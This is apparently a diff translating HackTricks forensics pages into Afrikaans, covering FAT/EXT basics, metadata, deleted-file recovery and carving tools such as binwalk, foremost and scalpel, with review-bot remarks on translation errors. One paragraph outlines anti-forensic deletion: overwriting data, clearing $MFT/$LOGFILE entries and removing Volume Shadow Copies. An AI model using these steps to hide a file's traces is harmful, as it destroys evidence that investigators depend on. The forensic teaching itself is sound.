Die **FAT (File Allocation Table)** lêerstelsel is ontwerp rondom sy kernkomponent, die lêertoewysingstabel, wat by die begin van die volume geplaas is. Hierdie stelsel beskerm data deur **twee kopieë** van die tabel te behou, wat data-integriteit verseker selfs as een daarvan beskadig is. Die tabel, tesame met die hoofmap, moet in 'n **vasgestelde posisie** wees, wat noodsaaklik is vir die opstartproses van die stelsel.
|
||||
|
||||
The file system's basic unit of storage is a **cluster, usually 512B**, comprising multiple sectors. FAT has evolved through versions:
|
||||
Die basiese eenheid van stoor van die lêerstelsel is 'n **kluster, gewoonlik 512B**, wat uit verskeie sektore bestaan. FAT het deur weergawes geëvolueer:
|
||||
|
||||
- **FAT12**, supporting 12-bit cluster addresses and handling up to 4078 clusters (4084 with UNIX).
|
||||
- **FAT16**, enhancing to 16-bit addresses, thereby accommodating up to 65,517 clusters.
|
||||
- **FAT32**, further advancing with 32-bit addresses, allowing an impressive 268,435,456 clusters per volume.
|
||||
- **FAT12**, wat 12-bits klusteradres ondersteun en tot 4078 klusters hanteer (4084 met UNIX).
|
||||
- **FAT16**, wat verbeter tot 16-bits adresse, en dus tot 65,517 klusters kan akkommodeer.
|
||||
- **FAT32**, wat verder gevorder het met 32-bits adresse, wat 'n indrukwekkende 268,435,456 klusters per volume moontlik maak.
|
||||
|
||||
A significant limitation across FAT versions is the **4GB maximum file size**, imposed by the 32-bit field used for file size storage.
|
||||
'n Belangrike beperking oor alle FAT-weergawes is die **maksimum lêergrootte van 4GB**, wat opgelê word deur die 32-bits veld wat vir lêergrootte stoor gebruik word.
|
||||
|
||||
Key components of the root directory, particularly for FAT12 and FAT16, include:
|
||||
Sleutelkomponente van die hoofgids, veral vir FAT12 en FAT16, sluit in:
|
||||
|
||||
- **File/Folder Name** (up to 8 characters)
|
||||
- **Attributes**
|
||||
- **Creation, Modification, and Last Access Dates**
|
||||
- **FAT Table Address** (indicating the start cluster of the file)
|
||||
- **File Size**
|
||||
- **Lêer/Map Naam** (tot 8 karakters)
|
||||
- **Eienskappe**
|
||||
- **Skep-, Wysigings- en Laaste Toegangsdatums**
|
||||
- **FAT Tabeladres** (wat die beginkluster van die lêer aandui)
|
||||
- **Lêergrootte**
|
||||
|
||||
### EXT
|
||||
|
||||
**Ext2** is the most common file system for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**.
|
||||
**Ext2** is die mees algemene lêerstelsel vir **nie-joernalering** partisies (**partisies wat nie veel verander nie**) soos die opstartpartisie. **Ext3/4** is **joernalering** en word gewoonlik gebruik vir die **res van die partisies**.
|
||||
|
||||
## **Metadata**
|
||||
|
||||
Some files contain metadata. This information is about the content of the file which sometimes might be interesting to an analyst as depending on the file type, it might have information like:
|
||||
Sommige lêers bevat metadata. Hierdie inligting gaan oor die inhoud van die lêer wat soms interessant kan wees vir 'n analis as gevolg van die lêertipe, wat inligting soos die volgende kan bevat:
|
||||
|
||||
* Title
|
||||
* MS Office Version used
|
||||
* Author
|
||||
* Dates of creation and last modification
|
||||
* Model of the camera
|
||||
* GPS coordinates
|
||||
* Image information
|
||||
* Titel
|
||||
* MS Office-weergawe wat gebruik is
|
||||
* Outeur
|
||||
* Skep- en laaste wysigingsdatums
|
||||
* Kamera model
|
||||
* GPS-koördinate
|
||||
* Beeldinligting
|
||||
|
||||
You can use tools like [**exiftool**](https://exiftool.org) and [**Metadiver**](https://www.easymetadata.com/metadiver-2/) to get the metadata of a file.
|
||||
Jy kan hulpmiddels soos [**exiftool**](https://exiftool.org) en [**Metadiver**](https://www.easymetadata.com/metadiver-2/) gebruik om die metadata van 'n lêer te verkry.
|
||||
|
||||
## **Deleted Files Recovery**
|
||||
## **Herwinning van Verwyderde Lêers**
|
||||
|
||||
### Logged Deleted Files
|
||||
### Gelogde Verwyderde Lêers
|
||||
|
||||
As was seen before there are several places where the file is still saved after it was "deleted". This is because usually the deletion of a file from a file system just marks it as deleted but the data isn't touched. Then, it's possible to inspect the registries of the files (like the MFT) and find the deleted files.
|
||||
Soos voorheen gesien is daar verskeie plekke waar die lêer steeds gestoor word nadat dit "verwyder" is. Dit is omdat die verwydering van 'n lêer uit 'n lêerstelsel dit gewoonlik merk as verwyder, maar die data word nie geraak nie. Daarom is dit moontlik om die rekords van die lêers (soos die MFT) te ondersoek en die verwyderde lêers te vind.
|
||||
|
||||
Also, the OS usually saves a lot of information about file system changes and backups, so it's possible to try to use them to recover the file or as much information as possible.
|
||||
Die bedryfstelsel stoor ook gewoonlik baie inligting oor lêerstelselveranderinge en rugsteun, so dit is moontlik om te probeer om dit te gebruik om die lêer of soveel moontlike inligting te herwin.
|
||||
|
||||
{% content-ref url="file-data-carving-recovery-tools.md" %}
|
||||
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### **File Carving**
|
||||
### **Lêer Carving**
|
||||
|
||||
**File carving** is a technique that tries to **find files in the bulk of data**. There are 3 main ways tools like this work: **Based on file types headers and footers**, based on file types **structures** and based on the **content** itself.
|
||||
**Lêer carving** is 'n tegniek wat probeer om lêers in die massa data te vind. Daar is 3 hoofmaniere waarop sulke gereedskap werk: **Gebaseer op lêertipes se koppe en voette**, gebaseer op lêertipes se **strukture** en gebaseer op die **inhoud** self.
|
||||
|
||||
Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it.
|
||||
Let daarop dat hierdie tegniek **nie werk om gefragmenteerde lêers te herwin nie**. As 'n lêer **nie in aaneenlopende sektore gestoor word nie**, sal hierdie tegniek dit nie kan vind nie, of ten minste 'n deel daarvan.
|
||||
|
||||
There are several tools that you can use for file Carving indicating the file types you want to search for
|
||||
Daar is verskeie gereedskap wat jy kan gebruik vir lêer Carving deur die lêertipes aan te dui wat jy wil soek
|
||||
|
||||
{% content-ref url="file-data-carving-recovery-tools.md" %}
|
||||
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Data Stream **C**arving
|
||||
### Datastroom **C**arving
|
||||
|
||||
Data Stream Carving is similar to File Carving but **instead of looking for complete files, it looks for interesting fragments** of information.\
|
||||
For example, instead of looking for a complete file containing logged URLs, this technique will search for URLs.
|
||||
Datastroom Carving is soortgelyk aan Lêer Carving, maar **in plaas daarvan om volledige lêers te soek, soek dit na interessante fragmente** van inligting.\
|
||||
Byvoorbeeld, in plaas daarvan om 'n volledige lêer te soek wat gelogde URL's bevat, sal hierdie tegniek soek na URL's.
|
||||
|
||||
{% content-ref url="file-data-carving-recovery-tools.md" %}
|
||||
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Secure Deletion
|
||||
### Veilige Verwydering
|
||||
|
||||
Obviously, there are ways to **"securely" delete files and part of logs about them**. For example, it's possible to **overwrite the content** of a file with junk data several times, and then **remove** the **logs** from the **$MFT** and **$LOGFILE** about the file, and **remove the Volume Shadow Copies**.\
|
||||
You may notice that even performing that action there might be **other parts where the existence of the file is still logged**, and that's true and part of the forensics professional job is to find them.
|
||||
Daar is natuurlik maniere om lêers en dele van logboeke oor hulle **"veilig" te verwyder**. Dit is byvoorbeeld moontlik om die inhoud van 'n lêer herhaaldelik met rommeldata te **oorlê**, en dan die **logboeke** van die **$MFT** en **$LOGFILE** oor die lêer te **verwyder**, en die **Volume Shadow Copies** te **verwyder**.\
|
||||
Jy mag opmerk dat selfs nadat daardie aksie uitgevoer is, daar **ander dele is waar die bestaan van die lêer steeds gelog word**, en dit is waar en deel van die forensiese professionele se werk is om dit te vind.
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
|
||||
* [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
|
||||
* [http://ntfs.com/ntfs-permissions.htm](http://ntfs.com/ntfs-permissions.htm)
|
||||
|
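Review bot: the translated heading "### Datastroom **C**arving" carries over the stray bold on a single letter from the English source, which renders as mid-word emphasis; write it as "### Datastroom Carving". In the same hunk the terminology is mixed: "lêer Carving" and "Datastroom Carving" keep "Carving" in English while "Veilige Verwydering" is fully translated, so pick one convention for the page and keep it aligned with the headings the two `file-data-carving-recovery-tools.md` cross-references point to. Keeping `$MFT`, `$LOGFILE` and "Volume Shadow Copies" untranslated in the secure-deletion paragraph is correct, as they are artifact names.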
@ -249,14 +246,14 @@ You may notice that even performing that action there might be **other parts whe
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,136 +1,124 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||
Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
|
||||
|
||||
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
||||
|
||||
***
|
||||
|
||||
# Carving & Recovery tools
|
||||
# Carving & Herstelgereedskap
|
||||
|
||||
More tools in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery)
|
||||
Meer gereedskap in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery)
|
||||
|
||||
## Autopsy
|
||||
|
||||
The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kinds of images, but not simple files.
|
||||
Die mees algemene gereedskap wat in forensika gebruik word om lêers uit beelde te onttrek, is [**Autopsy**](https://www.autopsy.com/download/). Laai dit af, installeer dit en laat dit die lêer insluk om "verborge" lêers te vind. Let daarop dat Autopsy gebou is om skyfbeelders en ander soorte beelde te ondersteun, maar nie eenvoudige lêers nie.
|
||||
|
||||
## Binwalk <a href="#binwalk" id="binwalk"></a>
|
||||
|
||||
**Binwalk** is a tool for analyzing binary files to find embedded content. It's installable via `apt` and its source is on [GitHub](https://github.com/ReFirmLabs/binwalk).
|
||||
|
||||
**Useful commands**:
|
||||
**Binwalk** is 'n gereedskap vir die analise van binêre lêers om ingebedde inhoud te vind. Dit kan geïnstalleer word via `apt` en die bronkode is op [GitHub](https://github.com/ReFirmLabs/binwalk).
|
||||
|
||||
**Nuttige opdragte**:
|
||||
```bash
|
||||
sudo apt install binwalk #Insllation
|
||||
binwalk file #Displays the embedded data in the given file
|
||||
binwalk -e file #Displays and extracts some files from the given file
|
||||
binwalk --dd ".*" file #Displays and extracts all files from the given file
|
||||
```
|
||||
|
||||
## Foremost
|
||||
|
||||
Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for its default configured file types.
|
||||
|
||||
'n Ander algemene instrument om verskuilde lêers te vind is **foremost**. Jy kan die opsetlêer van foremost in `/etc/foremost.conf` vind. As jy net wil soek na sekere spesifieke lêers, verwyder die kommentaarmerke. As jy niks verwyder nie, sal foremost soek na sy verstek geconfigureerde lêertipes.
|
||||
```bash
|
||||
sudo apt-get install foremost
|
||||
foremost -v -i file.img -o output
|
||||
#Discovered files will appear inside the folder "output"
|
||||
```
|
||||
|
||||
## **Scalpel**
|
||||
|
||||
**Scalpel** is another tool that can be used to find and extract **files embedded in a file**. In this case, you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract.
|
||||
|
||||
**Scalpel** is nog 'n instrument wat gebruik kan word om **lêers wat in 'n lêer ingebed is** te vind en te onttrek. In hierdie geval moet jy die lêertipes wat jy wil onttrek, ontkommentarieer uit die konfigurasie-lêer (_/etc/scalpel/scalpel.conf_).
|
||||
```bash
|
||||
sudo apt-get install scalpel
|
||||
scalpel file.img -o output
|
||||
```
|
||||
|
||||
## Bulk Extractor
|
||||
|
||||
This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor)
|
||||
|
||||
This tool can scan an image and will **extract pcaps** inside it, **network information (URLs, domains, IPs, MACs, mails)** and more **files**. You only have to do:
|
||||
Hierdie instrument kom binne kali, maar jy kan dit hier vind: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor)
|
||||
|
||||
Hierdie instrument kan 'n beeld skandeer en sal **pcaps onttrek** binne dit, **netwerkinligting (URL's, domeine, IP's, MAC's, e-posse)** en meer **lêers**. Jy hoef net te doen:
|
||||
```
|
||||
bulk_extractor memory.img -o out_folder
|
||||
```
|
||||
|
||||
Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**).
|
||||
Navigeer deur **alle inligting** wat die instrument ingesamel het (wagwoorde?), **analiseer** die **pakkies** (lees [**Pcaps-analise**](../pcap-inspection/)), soek na **vreemde domeine** (domeine wat verband hou met **kwaadwillige sagteware** of **nie-bestaande** domeine).
|
||||
|
||||
## PhotoRec
|
||||
|
||||
You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk\_Download)
|
||||
Jy kan dit vind by [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk\_Download)
|
||||
|
||||
It comes with GUI and CLI versions. You can select the **file-types** you want PhotoRec to search for.
|
||||
Dit kom met GUI- en CLI-weergawes. Jy kan die **lêertipes** kies wat PhotoRec moet soek.
|
||||
|
||||
![](<../../../.gitbook/assets/image (524).png>)
|
||||
|
||||
## binvis
|
||||
|
||||
Check the [code](https://code.google.com/archive/p/binvis/) and the [web page tool](https://binvis.io/#/).
|
||||
Kyk na die [kode](https://code.google.com/archive/p/binvis/) en die [webwerf-instrument](https://binvis.io/#/).
|
||||
|
||||
### Features of BinVis
|
||||
### Kenmerke van BinVis
|
||||
|
||||
* Visual and active **structure viewer**
|
||||
* Multiple plots for different focus points
|
||||
* Focusing on portions of a sample
|
||||
* **Seeing stings and resources**, in PE or ELF executables e. g.
|
||||
* Getting **patterns** for cryptanalysis on files
|
||||
* **Spotting** packer or encoder algorithms
|
||||
* **Identify** Steganography by patterns
|
||||
* **Visual** binary-diffing
|
||||
* Visuele en aktiewe **struktuurkyker**
|
||||
* Verskeie grafieke vir verskillende fokuspunte
|
||||
* Fokus op dele van 'n monster
|
||||
* **Sien reekse en hulpbronne**, in PE- of ELF-uitvoerbare lêers, byvoorbeeld
|
||||
* Kry **patrone** vir kripto-analise van lêers
|
||||
* **Opmerk** verpakker- of enkodeeralgoritmes
|
||||
* **Identifiseer** steganografie deur patrone
|
||||
* **Visuele** binêre verskil
|
||||
|
||||
BinVis is a great **start-point to get familiar with an unknown target** in a black-boxing scenario.
|
||||
BinVis is 'n goeie **beginpunt om bekend te raak met 'n onbekende teiken** in 'n swart-boks scenario.
|
||||
|
||||
# Specific Data Carving Tools
|
||||
# Spesifieke Data Carving-instrumente
|
||||
|
||||
## FindAES
|
||||
|
||||
Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker.
|
||||
Soek na AES-sleutels deur te soek na hul sleutelskedules. In staat om 128, 192 en 256 bit sleutels te vind, soos dié wat deur TrueCrypt en BitLocker gebruik word.
|
||||
|
||||
Download [here](https://sourceforge.net/projects/findaes/).
|
||||
Laai dit hier af: [here](https://sourceforge.net/projects/findaes/).
|
||||
|
||||
# Complementary tools
|
||||
# Aanvullende instrumente
|
||||
|
||||
You can use [**viu** ](https://github.com/atanunq/viu)to see images from the terminal.\
|
||||
You can use the linux command line tool **pdftotext** to transform a pdf into text and read it.
|
||||
Jy kan [**viu** ](https://github.com/atanunq/viu)gebruik om beelde vanuit die terminaal te sien.\
|
||||
Jy kan die Linux-opdraglyn-instrument **pdftotext** gebruik om 'n pdf in te skakel na teks en dit te lees.
|
||||
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||
Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
|
||||
|
||||
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
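Review bot: the Binwalk block keeps the source typo `sudo apt install binwalk #Insllation` (should read `#Installation`); the block is unchanged context in this hunk, but since the file is being rewritten anyway it is worth fixing here. In the BinVis feature list the English "Seeing stings and resources" is itself a typo for "strings", and the translation "Sien reekse en hulpbronne" carried the error over as "reekse" (sequences); it should read "Sien strings en hulpbronne", as the item is about string extraction from PE/ELF binaries. Two smaller consistency points: "skyfbeelders" in the Autopsy paragraph should be "skyfbeelde" (disk images), and "Laai dit hier af: [here](...)" leaves the link text in English where the sibling file writes "Laai [hier af](...)". The `bulk_extractor memory.img -o out_folder` fence has no language tag; tag it `bash` like the other command blocks on the page.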
@ -1,105 +1,93 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# Carving tools
|
||||
# Uitsnygereedskap
|
||||
|
||||
## Autopsy
|
||||
|
||||
The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kind of images, but not simple files.
|
||||
Die mees algemene gereedskap wat in forensika gebruik word om lêers uit beelde te onttrek, is [**Autopsy**](https://www.autopsy.com/download/). Laai dit af, installeer dit en laat dit die lêer inneem om "verborge" lêers te vind. Let daarop dat Autopsy gebou is om skyfbeelds en ander soorte beelde te ondersteun, maar nie eenvoudige lêers nie.
|
||||
|
||||
## Binwalk <a id="binwalk"></a>
|
||||
|
||||
**Binwalk** is a tool for searching binary files like images and audio files for embedded files and data.
|
||||
It can be installed with `apt` however the [source](https://github.com/ReFirmLabs/binwalk) can be found on github.
|
||||
**Useful commands**:
|
||||
|
||||
**Binwalk** is 'n gereedskap om binêre lêers soos beelde en klanklêers te soek vir ingebedde lêers en data.
|
||||
Dit kan geïnstalleer word met `apt`, maar die [bron](https://github.com/ReFirmLabs/binwalk) kan op GitHub gevind word.
|
||||
**Nuttige opdragte**:
|
||||
```bash
|
||||
sudo apt install binwalk #Insllation
|
||||
binwalk file #Displays the embedded data in the given file
|
||||
binwalk -e file #Displays and extracts some files from the given file
|
||||
binwalk --dd ".*" file #Displays and extracts all files from the given file
|
||||
```
|
||||
|
||||
## Foremost
|
||||
|
||||
Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for it's default configured file types.
|
||||
|
||||
'n Ander algemene instrument om verskuilde lêers te vind is **foremost**. Jy kan die opsetlêer van foremost in `/etc/foremost.conf` vind. As jy net wil soek na sekere spesifieke lêers, verwyder die kommentaarmerke. As jy niks verwyder nie, sal foremost soek na sy verstek geconfigureerde lêertipes.
|
||||
```bash
|
||||
sudo apt-get install foremost
|
||||
foremost -v -i file.img -o output
|
||||
#Discovered files will appear inside the folder "output"
|
||||
```
|
||||
|
||||
## **Scalpel**
|
||||
|
||||
**Scalpel** is another tool that can be use to find and extract **files embedded in a file**. In this case you will need to uncomment from the configuration file \(_/etc/scalpel/scalpel.conf_\) the file types you want it to extract.
|
||||
|
||||
**Scalpel** is nog 'n instrument wat gebruik kan word om **lêers wat in 'n lêer ingebed is** te vind en te onttrek. In hierdie geval moet jy die lêertipes wat jy wil onttrek, ontkommentarieer uit die konfigurasie-lêer (_/etc/scalpel/scalpel.conf_).
|
||||
```bash
|
||||
sudo apt-get install scalpel
|
||||
scalpel file.img -o output
|
||||
```
|
||||
|
||||
## Bulk Extractor
|
||||
|
||||
This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor)
|
||||
|
||||
